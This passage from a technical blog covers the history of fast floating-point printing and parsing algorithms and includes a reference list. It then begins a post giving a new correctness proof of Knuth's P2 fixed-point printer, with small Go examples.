and formally verified it in ACL2,
and Giulietti [<a class=footref id='fnref-12-3' href='#fn-12'>12</a>] used that result to create
the Schubfach shortest-width printing algorithm in 2018.
(In fact Giulietti and Nadezhin showed that
126-bit tables are sufficient,
which is important because Java lacks unsigned 64-bit integers.)
<p>
Unrounded scaling’s shortest-width algorithm
is adapted from Schubfach,
which introduced the critical observation
that with the right choice of <math><mi>p</mi></math>,
at most one valid decimal can end in zero.
Schubfach’s main scaling operation ‘rop’
can be viewed as a special case of unrounded scaling;
Giulietti seems to have even invented the
unrounded form from first principles
(as opposed to adapting IEEE754 implementation techniques as I did).
Schubfach’s rop does not make use of the carry bit optimization,
which is the main reason it runs slower than unrounded scaling.
The Schubfach implementation was adopted
by Java’s OpenJDK <a href="https://bugs.openjdk.org/browse/JDK-8202555">after being reviewed by Steele</a>.
<p>
Apparently independently of Hack, Nadezhin, and Giulietti,
Adams [<a class=footref id='fnref-2-5' href='#fn-2'>2</a>] also discovered that 126-bit precision sufficed
and used that fact to build the Ryū algorithm in 2018.
Ryū does not make use of the carry bit optimization;
its rounding and exactness computations are more complex
than needed; and it finds shortest-width outputs
by repeated division by 10 of the scaled minimum
and maximum decimals, which adds to the expense.
Even so, the improvement over Grisu was clear,
and Adams’s paper was more succinct than Giulietti’s.
Many languages and browsers adopted Ryū.
<p>
In 2020, Jeon [<a class=footref id='fnref-16' href='#fn-16'>16</a>] proposed a new algorithm Grisu-Exact,
applying Ryū’s 128-bit results to Loitsch’s Grisu2 algorithm.
The result does remove the fallback, but it is quite complex.
In 2024, Jeon [<a class=footref id='fnref-17-3' href='#fn-17'>17</a>] proposed Dragonbox,
which applied the Grisu-Exact approach to
optimizing Schubfach.
The result does run faster but once again adds significant
complexity.
The unrounded scaling approach to shortest-width printing
in this post can also be viewed as a 128-bit Grisu2 like Grisu-Exact
or as an optimized Schubfach like Dragonbox,
but it is simpler than either.
The zero-trimming algorithm in this post
is adapted from Dragonbox’s.
<a class=anchor href="#related.parse"><h3 id="related.parse">Parsing</h3></a>
<p>
Parsing has a much shorter history than printing.
As noted earlier,
Mancino [<a class=footref id='fnref-24-3' href='#fn-24'>24</a>] wrote in 1966 that
table-based multiplication algorithms
were “often” used for decimal-to-binary conversions.
Coonen’s 1984 thesis [<a class=footref id='fnref-9-2' href='#fn-9'>9</a>] gave a precise error analysis
for the kinds of inexact algorithms
that were used until Clinger’s 1990 publication of
“How to read floating-point numbers correctly” [<a class=footref id='fnref-6-3' href='#fn-6'>6</a>].
Clinger’s approach is to use an inexact IEEE754
extended-precision floating-point calculation (using a float80 with a 64-bit mantissa)
to get an answer that is either the correct float64 or adjacent to the correct float64,
and then to check it with a single bignum calculation
and adjust upward or downward as needed.
Gay [<a class=footref id='fnref-11-4' href='#fn-11'>11</a>] quickly improved on this by identifying new special cases
and removing the dependence on extended precision
(replacing float80s with float64s).
<p>
As noted already, Slishman [<a class=footref id='fnref-29-3' href='#fn-29'>29</a>] published in 1990
a table-based parser with carry-bit-based fallback to bignums,
and then Hack [<a class=footref id='fnref-14-3' href='#fn-14'>14</a>] proved in 2004 that
128-bit precision was sufficient to remove the bignum fallback
during parsing.
While that report inspired Giulietti’s development of the Schubfach printer
and Nadezhin’s proof,
it does not seem to have been used in any actual floating-point parsers
besides IBM’s.
<p>
In 2020, based on a suggestion and initial code by Eisel,
and apparently completely independent of Slishman and Hack,
Lemire implemented a fast floating-point parser
using a 128-bit table [<a class=footref id='fnref-21' href='#fn-21'>21</a>] [<a class=footref id='fnref-22-3' href='#fn-22'>22</a>] [<a class=footref id='fnref-32' href='#fn-32'>32</a>].
The Eisel-Lemire algorithm is essentially Slishman’s
except with 64 extra bits of precision instead of 16.
Lemire used a fallback just as Slishman did,
unsure that it was unreachable with 128-bit precision.
Mushtak and Lemire [<a class=footref id='fnref-25' href='#fn-25'>25</a>]
published their analog to Hack’s proof a couple years later,
allowing the fallback to be removed.
<p>
The unrounded scaling approach to parsing
is analogous to the approach
pioneered by Slishman, Hack, Eisel, Lemire, and Mushtak,
just framed more generally
and with the carry bit optimization.
<a class=anchor href="#fast_unrounded_scaling"><h3 id="fast_unrounded_scaling">Fast Unrounded Scaling</h3></a>
<p>
Fast unrounded scaling can be viewed as a combination,
generalization, simplification, and optimization of these critical earlier works:
<ul>
<li>
In 1990, Slishman [<a class=footref id='fnref-29-4' href='#fn-29'>29</a>] used the table-based algorithms
for fixed-width printing and parsing, with a carry-bit fallback check,
but without enough precision to be completely exact.
<li>
In 2004, Hack [<a class=footref id='fnref-14-4' href='#fn-14'>14</a>] improved Slishman’s algorithm
by observing that 128-bit precision allowed removing the fallback.
It is unclear why Hack considered only parsing and
did not generalize to printing.
<li>
In 2010, Loitsch [<a class=footref id='fnref-23-4' href='#fn-23'>23</a>] used a table-based algorithm
for shortest-width printing but, echoing Slishman,
without enough precision to be completely exact.
Loitsch used a new approach to check for exactness
and trigger a fallback.
<li>
In 2018, Giulietti [<a class=footref id='fnref-12-4' href='#fn-12'>12</a>] used a table-based algorithm
for shortest-width printing with enough precision to be exact,
along with the critical observation about finding
formats ending in zero.
The only arguable shortcoming was not using the carry bit
optimization to halve the cost of the scaling multiplication.
<li>
Also in 2018, Adams [<a class=footref id='fnref-2-6' href='#fn-2'>2</a>] used a different table-based algorithm
for shortest-width printing and popularized the fact
that 128 bits was enough precision to be exact.
<li>
In 2020, Eisel and Lemire [<a class=footref id='fnref-22-4' href='#fn-22'>22</a>] rederived
a 128-bit form of Slishman’s algorithm.
Then in 2023, Mushtak and Lemire [<a class=footref id='fnref-25-2' href='#fn-25'>25</a>] proved
that the fallback was unreachable
using methods similar to Hack’s.</ul>
<p>
Even though all the necessary pieces are in those papers waiting to be
connected, it appears that no one did until now.
<p>
As mentioned earlier, I derived the
unrounded scaling <a href="#fixed">fixed-width printer</a>
as an optimized version of Oudompheng’s
Ryū-inspired table-driven algorithm.
While writing up that algorithm with
a new lattice-reduction-based proof of correctness,
I re-read Loitsch’s paper and
realized that for <a href="#short">shortest-width printing</a>,
unrounded scaling
enabled replacing Grisu’s approximate
calculations of the decimal bounds
with exact calculations, eliminating the fallback entirely.
Continuing to read related papers,
I read Giulietti’s Schubfach paper for the first time
and was surprised to find how much of the
approach Giulietti had anticipated,
including apparently reinventing the IEEE754
extra bits.
When I read Lemire’s paper,
I was even more surprised to find
the carry bit fallback check;
the carry bit analysis had played an important role
in my proof of unrounded scaling,
and this was the first similar analysis I had encountered.
(At that point I had not found Slishman’s paper.)
That’s when I realized unrounded scaling also <a href="#parse">applied to parsing</a>.
I knew from my proof that Lemire didn’t need the
fallback.
When I went looking for the code that implemented it
in Lemire’s library,
I found instead a mention of Mushtak and Lemire’s followup proof.
I discovered the other references later.
<p>
My contribution here is primarily a
synthesis of all this prior work into a single unified framework
with a simple explanation and relatively straightforward code.
Thanks to all the authors of this critical earlier work,
whose shoulders I am grateful to be standing on.
<a class=anchor href="#conclusion"><h2 id="conclusion">Conclusion</h2></a>
<p>
Floating-point printing and parsing of
reasonably sized decimals
can be done very quickly with very little code.
At long last, the dragons have been vanquished.
<p>
In this post, I have tried to give credit where credit is due
and to represent others’ work fairly and accurately.
I would be extremely grateful to receive additions, corrections,
or suggestions at <a href="mailto:rsc@swtch.com">rsc@swtch.com</a>.
<a class=anchor href="#references"><h2 id="references">References</h2></a>
<ol class=fn>
<li id=fn-1>
P. H. Abbott <i>et al.</i>, “<a href="https://ieeexplore.ieee.org/document/5389154">Architecture and software support in IBM S/390 Parallel Enterprise Servers for IEEE Floating-Point arithmetic</a>”, <i>IBM Journal of Research and Development</i> 43(6), September 1999. <a class=fnref href='#fnref-1'>↩</a>
<li id=fn-2>
Ulf Adams, “<a href="https://dl.acm.org/doi/10.1145/3192366.3192369">Ryū: Fast Float-to-String Conversion</a>”, Proceedings of ACM PLDI 2018. <a class=fnref href='#fnref-2'>↩</a>
<a class=fnref href='#fnref-2-2'>↩</a>
<a class=fnref href='#fnref-2-3'>↩</a>
<a class=fnref href='#fnref-2-4'>↩</a>
<a class=fnref href='#fnref-2-5'>↩</a>
<a class=fnref href='#fnref-2-6'>↩</a>
<li id=fn-3>
Ulf Adams, “<a href="https://dl.acm.org/doi/10.1145/3360595">Ryū Revisited: Printf Floating Point Conversion</a>”, Proceedings of ACM OOPSLA 2019. <a class=fnref href='#fnref-3'>↩</a>
<a class=fnref href='#fnref-3-2'>↩</a>
<li id=fn-4>
Marc Andrysco, Ranjit Jhala, Sorin Lerner, “<a href="https://dl.acm.org/doi/10.1145/2837614.2837654">Printing Floating-Point Numbers: An Always Correct Method</a>”, Proceedings of ACM POPL 2016. <a class=fnref href='#fnref-4'>↩</a>
<a class=fnref href='#fnref-4-2'>↩</a>
<li id=fn-5>
Robert G. Burger and R. Kent Dybvig, “<a href="https://dl.acm.org/doi/10.1145/231379.231397">Printing Floating-Point Numbers Quickly and Accurately</a>”, Proceedings of ACM PLDI 1996. <a class=fnref href='#fnref-5'>↩</a>
<li id=fn-6>
William D. Clinger, “<a href="https://dl.acm.org/doi/pdf/10.1145/93548.93557">How to Read Floating Point Numbers Accurately</a>”, ACM SIGPLAN Notices 25(6), June 1990 (PLDI 1990). <a class=fnref href='#fnref-6'>↩</a>
<a class=fnref href='#fnref-6-2'>↩</a>
<a class=fnref href='#fnref-6-3'>↩</a>
<li id=fn-7>
Jerome T. Coonen, “<a href="https://www.computer.org/csdl/magazine/co/1980/01/01653344/13rRUxbCbof">An Implementation Guide to a Proposed Standard for Floating-Point Arithmetic</a>”, <i>Computer</i> 13, January 1980. Reprinted as Chapter 2 of [<a class=footref id='fnref-9-3' href='#fn-9'>9</a>]. <a class=fnref href='#fnref-7'>↩</a>
<a class=fnref href='#fnref-7-2'>↩</a>
<li id=fn-8>
Jerome T. Coonen, “<a href="https://www.computer.org/csdl/magazine/co/1981/03/01667289/13rRUy0HYMA">Underflow and the Denormalized Numbers</a>”, <i>Computer</i> 14, March 1981. <a class=fnref href='#fnref-8'>↩</a>
<li id=fn-9>
Jerome T. Coonen, “<a href="https://ieeemilestones.ethw.org/File:JeromeCoonen_PhD_Thesis.pdf">Contributions to a Proposed Standard for Binary Floating-Point Arithmetic</a>”, University of California, Berkeley Ph.D. thesis, 1984. <a class=fnref href='#fnref-9'>↩</a>
<a class=fnref href='#fnref-9-2'>↩</a>
<a class=fnref href='#fnref-9-3'>↩</a>
<li id=fn-10>
T. J. Dekker, “<a href="https://csclub.uwaterloo.ca/~pbarfuss/dekker1971.pdf">A Floating-Point Technique for Extending the Available Precision</a>”, <i>Numerische Mathematik</i> 18(3), June 1971. <a class=fnref href='#fnref-10'>↩</a>
<li id=fn-11>
David M. Gay, “<a href="https://www.ampl.com/_archive/first-website/REFS/rounding.pdf">Correctly Rounded Binary-Decimal and Decimal-Binary Conversions</a>”, AT&T Bell Laboratories Technical Report, 1990. <a class=fnref href='#fnref-11'>↩</a>
<a class=fnref href='#fnref-11-2'>↩</a>
<a class=fnref href='#fnref-11-3'>↩</a>
<a class=fnref href='#fnref-11-4'>↩</a>
<li id=fn-12>
Raffaello Giulietti, “<a href="https://drive.google.com/file/d/1IEeATSVnEE6TkrHlCYNY2GjaraBjOT4f/edit">The Schubfach way to render doubles</a>”, published online, 2018, revised 2021. <a class=fnref href='#fnref-12'>↩</a>
<a class=fnref href='#fnref-12-2'>↩</a>
<a class=fnref href='#fnref-12-3'>↩</a>
<a class=fnref href='#fnref-12-4'>↩</a>
<li id=fn-13>
Herman H. Goldstine and John von Neumann, <a href="https://www.ias.edu/sites/default/files/library/pdfs/ecp/planningcodingof0103inst.pdf"><i>Planning and Coding Problems for an Electronic Computing Instrument</i></a>, Institute for Advanced Study Report, 1947. <a class=fnref href='#fnref-13'>↩</a>
<li id=fn-14>
Michel Hack, “<a href="https://dominoweb.draco.res.ibm.com/reports/rc23203.pdf">On Intermediate Precision Required for Correctly-Rounding Decimal-to-Binary Floating-Point Conversion</a>”, IBM Technical Paper, May 2004. <a class=fnref href='#fnref-14'>↩</a>
<a class=fnref href='#fnref-14-2'>↩</a>
<a class=fnref href='#fnref-14-3'>↩</a>
<a class=fnref href='#fnref-14-4'>↩</a>
<li id=fn-15>
Kenton Hanson, “<a href="https://web.archive.org/web/20000607192440/http://www.dnai.com/~khanson/ECRBDC.html">Economical Correctly Rounded Binary Decimal Conversions</a>”, published online 1997. <a class=fnref href='#fnref-15'>↩</a>
<a class=fnref href='#fnref-15-2'>↩</a>
<li id=fn-16>
Junekey Jeon, “<a href="https://fmt.dev/papers/Grisu-Exact.pdf">Grisu-Exact: A Fast and Exact Floating-Point Printing Algorithm</a>”, published online, 2020. <a class=fnref href='#fnref-16'>↩</a>
<li id=fn-17>
Junekey Jeon, “<a href="https://raw.githubusercontent.com/jk-jeon/dragonbox/master/other_files/Dragonbox.pdf">Dragonbox: A New Floating-Point Binary-to-Decimal Conversion Algorithm</a>”, published online, 2024. <a class=fnref href='#fnref-17'>↩</a>
<a class=fnref href='#fnref-17-2'>↩</a>
<a class=fnref href='#fnref-17-3'>↩</a>
<li id=fn-18>
Donald E. Knuth, <i>The Art of Computer Programming, Volume 2: Seminumerical Algorithms</i>, first edition, Addison-Wesley, 1969. <a class=fnref href='#fnref-18'>↩</a>
<a class=fnref href='#fnref-18-2'>↩</a>
<li id=fn-19>
Donald E. Knuth, <i>The Art of Computer Programming, Volume 2: Seminumerical Algorithms</i>, second edition, Addison-Wesley, 1981. <a class=fnref href='#fnref-19'>↩</a>
<li id=fn-20>
Donald E. Knuth, <i>The Art of Computer Programming, Volume 2: Seminumerical Algorithms</i>, third edition, Addison-Wesley, 1997. <a class=fnref href='#fnref-20'>↩</a>
<li id=fn-21>
Daniel Lemire, “<a href="https://lemire.me/blog/2020/03/10/fast-float-parsing-in-practice/">Fast float parsing in practice</a>”, published online, March 2020. <a class=fnref href='#fnref-21'>↩</a>
<li id=fn-22>
Daniel Lemire, “<a href="https://arxiv.org/abs/2101.11408">Number Parsing at a Gigabyte per Second</a>”, <i>Software: Practice and Experience</i> 51(8), 2021. <a class=fnref href='#fnref-22'>↩</a>
<a class=fnref href='#fnref-22-2'>↩</a>
<a class=fnref href='#fnref-22-3'>↩</a>
<a class=fnref href='#fnref-22-4'>↩</a>
<li id=fn-23>
Florian Loitsch, “<a href="https://dl.acm.org/doi/10.1145/1809028.1806623">Printing Floating-Point Numbers Quickly and Accurately with Integers</a>”, ACM SIGPLAN Notices 45(6), June 2010 (PLDI 2010). <a class=fnref href='#fnref-23'>↩</a>
<a class=fnref href='#fnref-23-2'>↩</a>
<a class=fnref href='#fnref-23-3'>↩</a>
<a class=fnref href='#fnref-23-4'>↩</a>
<li id=fn-24>
O. G. Mancino, “<a href="https://dl.acm.org/doi/10.1145/355592.365635">Multiple Precision Floating-Point Conversion from Decimal-to-Binary and Vice Versa</a>”, <i>Communications of the ACM</i> 9(5), May 1966. <a class=fnref href='#fnref-24'>↩</a>
<a class=fnref href='#fnref-24-2'>↩</a>
<a class=fnref href='#fnref-24-3'>↩</a>
<li id=fn-25>
Noble Mushtak and Daniel Lemire, “<a href="https://arxiv.org/pdf/2212.06644">Fast Number Parsing Without Fallback</a>”, <i>Software: Practice and Experience</i>, 2023. <a class=fnref href='#fnref-25'>↩</a>
<a class=fnref href='#fnref-25-2'>↩</a>
<li id=fn-26>
Dmitry Nadezhin, <a href="https://github.com/nadezhin/verify-todec">nadezhin/verify-todec GitHub repository</a>, published online, 2018. <a class=fnref href='#fnref-26'>↩</a>
<li id=fn-27>
John F. Palmer, “<a href="https://www.arithmazium.org/library/lib/palmer_intel_standard_nov1977.pdf">The Intel Standard for Floating-Point Arithmetic</a>”, Proceedings of COMPSAC 1977. <a class=fnref href='#fnref-27'>↩</a>
<li id=fn-28>
Vern Paxson, “<a href="https://www.icir.org/vern/papers/testbase-report.pdf">A Program for Testing IEEE Decimal-Binary Conversion</a>”, class paper 1991. <a class=fnref href='#fnref-28'>↩</a>
<li id=fn-29>
Gordon Slishman, “<a href="https://mp7.watson.ibm.com/f55d084fadf9ae59852574ab0058f749.html">Fast and Perfectly Rounding Decimal/Hexadecimal Conversions</a>”, IBM Research Report, April 1990. <a class=fnref href='#fnref-29'>↩</a>
<a class=fnref href='#fnref-29-2'>↩</a>
<a class=fnref href='#fnref-29-3'>↩</a>
<a class=fnref href='#fnref-29-4'>↩</a>
<li id=fn-30>
Guy L. Steele and Jon L. White, “<a href="https://dl.acm.org/doi/10.1145/93548.93559">How to Print Floating-Point Numbers Accurately</a>”, ACM SIGPLAN Notices 25(6), June 1990 (PLDI 1990). <a class=fnref href='#fnref-30'>↩</a>
<a class=fnref href='#fnref-30-2'>↩</a>
<a class=fnref href='#fnref-30-3'>↩</a>
<li id=fn-31>
Guy L. Steele and Jon L. White, “<a href="https://dl.acm.org/doi/10.1145/989393.989431">How to Print Floating-Point Numbers Accurately (Retrospective)</a>”, ACM SIGPLAN Notices 39(4), April 2004 (Best of PLDI, 1979-1999). <a class=fnref href='#fnref-31'>↩</a>
<a class=fnref href='#fnref-31-2'>↩</a>
<li id=fn-32>
Nigel Tao, “<a href="https://nigeltao.github.io/blog/2020/eisel-lemire.html">The Eisel-Lemire ParseNumberF64 Algorithm</a>”, published online, October 2020. <a class=fnref href='#fnref-32'>↩</a>
<li id=fn-33>
Donald Taranto, “<a href="https://dl.acm.org/doi/10.1145/368370.368376">Binary Conversion, With Fixed Decimal Precision, Of a Decimal Fraction</a>”, <i>Communications of the ACM</i> 2(7), July 1959. <a class=fnref href='#fnref-33'>↩</a>
<li id=fn-34>
Henry S. Warren, Jr., <i>Hacker’s Delight, 2nd ed.</i>, Addison-Wesley, 2012. <a class=fnref href='#fnref-34'>↩</a>
</ol>
Pulling a New Proof from Knuth’s Fixed-Point Printertag:research.swtch.com,2012:research.swtch.com/fp-knuth2026-01-10T09:00:00-05:002026-01-10T09:02:00-05:00A birthday proof for Don Knuth (Floating Point Formatting, Part 2)<style>
pre code !important { word-spacing: normal; }
code { word-spacing: -0.25em; }
mtd { padding: 0.5ex 0.2em 0.5ex 0.2em; }
mi, mtext, mn { font-family: 'Minion 3'; }
mn.nbf { font-weight: bold; }
math[display="block"] { padding: 0.5em 0; }
mo.compact { lspace: 0; rspace: 0; }
mphantom.vphantom { width: 0; }
</style>
<a class=anchor href="#introduction"><h2 id="introduction">Introduction</h2></a>
<p>
Donald Knuth wrote his 1989 paper “A Simple Program Whose Proof Isn’t”
as part of a tribute to Edsger Dijkstra on the occasion of Dijkstra’s 60th birthday.
Today’s post is a reply to Knuth’s paper on the occasion of Knuth’s 88th birthday.
<p>
In his paper, Knuth posed the problem
of converting 16-bit fixed-point binary fractions to decimal fractions,
aiming for the shortest decimal that converts back to the original 16-bit binary fraction.
Knuth gives a program named <i>P2</i> that leaves digits in the array <i>d</i> and a digit count in <i>k</i>:<blockquote>
<p>
<i>P2</i>: <br>
<i>j</i> := 0; <i>s</i> := 10 * <i>n</i> + 5; <i>t</i> := 10; <br>
<b>repeat</b> <b>if</b> <i>t</i> > 65536 <b>then</b> <i>s</i> := <i>s</i> + 32768 − (<i>t</i> <b>div</b> 2); <br>
<i>j</i> := <i>j</i> + 1; <i>d</i>[<i>j</i>] := <i>s</i> <b>div</b> 65536; <br>
<i>s</i> := 10 * (<i>s</i> <b>mod</b> 65536); <i>t</i> := 10 * <i>t</i>; <br>
<b>until</b> <i>s</i> ≤ <i>t</i>; <br>
<i>k</i> := <i>j</i>.</blockquote>
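<p>
For readers who find the Algol-style pseudocode hard to scan, here is a direct
transliteration of <i>P2</i> into Go (my own rendering, not from Knuth’s paper),
returning the digits most significant first:
<div class=showcode><pre>package main

import "fmt"

<span class=showcode-comment>// p2 transliterates Knuth's program P2: given n, representing the</span>
<span class=showcode-comment>// fraction f = n/65536, it returns the digits of the shortest accurate</span>
<span class=showcode-comment>// correctly rounded decimal for f, most significant digit first.</span>
func p2(n int) []int {
	var d []int
	s := 10*n + 5
	t := 10
	for {
		if t > 65536 {
			s += 32768 - t/2
		}
		d = append(d, s/65536)
		s = 10 * (s % 65536)
		t *= 10
		if s <= t {
			break
		}
	}
	return d
}

func main() {
	fmt.Println(p2(1))     <span class=showcode-comment>// [0 0 0 0 2]: 1/65536 prints as 0.00002</span>
	fmt.Println(p2(32768)) <span class=showcode-comment>// [5]: 32768/65536 prints as 0.5</span>
}</pre></div><div class=showcode-end></div>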
<p>
Knuth’s goal was to prove <i>P2</i> correct without exhaustive testing,
and he did, but he didn’t consider the proof ‘simple’.
(Since there are only a small finite number of inputs,
Knuth notes that this problem is a counterexample to Dijkstra’s remark that
“testing can reveal the presence of errors but not their absence.”
Exhaustive testing would technically prove the program correct,
but Knuth wants a proof that reveals <i>why</i> it works.)
<p>
At the end of the paper, Knuth wrote, “So. Is there a better program, or a better proof,
or a better way to solve the problem?”
This post presents what is, in my opinion, a better proof of the correctness of <i>P2</i>.
It starts with a simpler program with a trivial direct proof of correctness.
Then it transforms that simpler program into <i>P2</i>, step by step,
proving the correctness of each transformation.
The post then considers a few other ways to solve the problem,
including one from a textbook that Knuth probably had within easy reach.
Finally, it concludes with
some reflections on the role of language in shaping our programs and proofs.
<a class=anchor href="#problem_statement"><h2 id="problem_statement">Problem Statement</h2></a>
<p>
Let’s start with a precise definition of the problem.
The input is a fraction <math><mi>f</mi></math> of the form <math><mrow><mi>n</mi><mn>/2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></math> for some integer <math><mrow><mi>n</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo stretchy=false>)</mo></mrow></math>.
We want to convert <math><mi>f</mi></math> to the shortest accurate correctly rounded decimal form.
<ul>
<li>
By ‘correctly rounded’ we mean that the decimal is <math><mrow><mi>d</mi><mo>=</mo><mrow><mo stretchy=false>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>+</mo><mn>½</mn></mrow><mo stretchy=false>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>—that is, <math><mi>d</mi></math> is <math><mi>f</mi></math> rounded to <math><mi>p</mi></math> digits—for some <math><mi>p</mi></math>.
<li>
By ‘accurate’ we mean that the decimal rounds back exactly:
<math><mrow><mrow><mo stretchy=false>⌊</mo><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>+</mo><mn>½</mn></mrow><mo stretchy=false>⌋</mo></mrow><MO>/</MO><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>=</mo><mi>f</mi></mrow></math>.
<li>
By ‘shortest’ we mean that any shorter correctly rounded decimal <math><mrow><mrow><mo stretchy=false>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>q</mi></msup><mo>+</mo><mn>½</mn></mrow><mo stretchy=false>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>q</mi></msup></mrow></math> for <math><mrow><mi>q</mi><mo><</mo><mi>p</mi></mrow></math> is not accurate.</ul>
<p>
(For this problem, Knuth assumes “round half up” behavior,
as opposed to IEEE 754 “round half to even”,
and the rounding equations reflect this.
The answer does not change significantly if we use IEEE rounding instead.)
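<p>
To make these definitions concrete, take n = 1, so f = 1/65536 ≈ 0.0000152587890625.
The 5-digit rounding of f is 0.00002, which rounds back to 1/65536 and so is accurate,
while the 4-digit rounding 0.0000 rounds back to 0 and is not;
the shorter roundings are all 0 as well, so the answer for this input is 0.00002.
Here is a small Go check of that arithmetic (an illustration of mine, not from Knuth’s paper):
<div class=showcode><pre>package main

import (
	"fmt"
	"math"
)

func main() {
	f := 1.0 / 65536 <span class=showcode-comment>// exact in float64</span>
	roundTo := func(x float64, p int) float64 {
		s := math.Pow(10, float64(p))
		return math.Floor(x*s+0.5) / s <span class=showcode-comment>// round half up to p decimal digits</span>
	}
	accurate := func(d float64) bool {
		return math.Floor(d*65536+0.5)/65536 == f <span class=showcode-comment>// does d round back to f?</span>
	}
	d5 := roundTo(f, 5)
	d4 := roundTo(f, 4)
	fmt.Println(d5, accurate(d5)) <span class=showcode-comment>// 2e-05 true</span>
	fmt.Println(d4, accurate(d4)) <span class=showcode-comment>// 0 false</span>
}</pre></div><div class=showcode-end></div>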
<a class=anchor href="#notation"><h2 id="notation">Notation</h2></a>
<p>
Next, let’s define some convenient notation.
As usual we will write the fractional part of <math><mi>x</mi></math>
as <math><mrow><mo>{</mo><mi>x</mi><mo>}</mo></mrow></math>
and rounding as <math><mrow><mrow><mo>[</mo><mi>x</mi><mo>]</mo></mrow><mo>=</mo><mrow><mo>⌊</mo><mrow><mi>x</mi><mo>+</mo><mn>½</mn></mrow><mo>⌋</mo></mrow></mrow></math>.
We will also define <math><msub><mrow><mo>{</mo><mi>x</mi><mo>}</mo></mrow><mi>p</mi></msub></math>, <math><msub><mrow><mo>⌊</mo><mi>x</mi><mo>⌋</mo></mrow><mi>p</mi></msub></math>, <math><msub><mrow><mo>⌈</mo><mi>x</mi><mo>⌉</mo></mrow><mi>p</mi></msub></math>, and <math><msub><mrow><mo>[</mo><mi>x</mi><mo>]</mo></mrow><mi>p</mi></msub></math>
to be the fractional part, floor, ceiling, and rounding
of <math><mi>x</mi></math> relative to decimal fractions with <math><mi>p</mi></math> digits:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><msub><mrow><mo>{</mo><mi>x</mi><mo>}</mo></mrow><mi>p</mi></msub></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>{</mo><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>}</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><msub><mrow><mo>⌊</mo><mi>x</mi><mo>⌋</mo></mrow><mi>p</mi></msub></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><msub><mrow><mo>⌈</mo><mi>x</mi><mo>⌉</mo></mrow><mi>p</mi></msub></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌈</mo><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌉</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><msub><mrow><mo>[</mo><mi>x</mi><mo>]</mo></mrow><mi>p</mi></msub></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>[</mo><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>]</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd></mtr></mtable></math></div>
<p>
Using the new notation, the correctly rounded <math><mi>p</mi></math>-digit decimal for <math><mi>f</mi></math> is <math><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mi>p</mi></msub></math>.
<p>
Following Knuth’s paper, this post also uses the notation
<math><mrow><mo stretchy=false>[</mo><mi>x</mi><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mi>y</mi><mo stretchy=false>]</mo></mrow></math> for the interval from <math><mi>x</mi></math> to <math><mi>y</mi></math>, including <math><mi>x</mi></math> and <math><mi>y</mi></math>;
<math><mrow><mo stretchy=false>[</mo><mi>x</mi><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mi>y</mi><mo stretchy=false>)</mo></mrow></math> is the half-open interval, which excludes <math><mi>y</mi></math>.
<a class=anchor href="#initial_solution"><h2 id="initial_solution">Initial Solution</h2></a>
<p>
The definitions of ‘accurate’ and ‘correctly rounded’ imply two simple observations,
which we will prove as lemmas.
(In my attempt to avoid accusations of imprecision,
I may well be too pedantic.
Skip the proof of any lemma you think is obviously true.)
<div class=lemma id=accuracy>
<p>
<b><i>Accuracy Lemma</i></b>. The accurate decimals are those in the <i>accuracy interval</i> <math><mrow><mo stretchy=false>[</mo><mi>f</mi><MO lspace='0' rspace='0'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mi>f</mi><MO lspace='0' rspace='0'>+</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo stretchy=false>)</mo></mrow></math>.
<p>
